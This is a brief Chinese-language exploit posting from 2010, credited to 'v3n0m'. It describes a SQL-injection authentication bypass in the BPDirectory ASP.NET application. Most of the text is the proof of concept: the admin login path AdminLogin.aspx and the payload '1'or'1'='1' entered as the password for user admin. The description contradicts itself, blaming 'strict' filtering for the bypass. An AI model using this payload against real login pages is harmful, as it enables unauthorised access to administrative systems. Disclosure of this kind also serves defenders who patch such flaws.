BPDirectory Authentication 密码绕过漏洞
时间:2010-11-16 来源:v3n0m
发布日期:2010-11.16
发布作者:v3n0m
影响版本:未知
官方地址:http://www.bpowerhouse.info
漏洞类型:万能密码
漏洞描述:BPDirectory Authentication是一款ASP.NET的程序,后台登录验证严格过滤导致万能密码绕过SQL验证进入后台。
Exploit & p0c
_____________
后台登录
http://127.0.0.1/[path]/AdminLogin.aspx
使用以下登录用户与密码绕过登录验证
Username : admin
Password : 1'or'1'='1
标签分类:
相关阅读 更多 +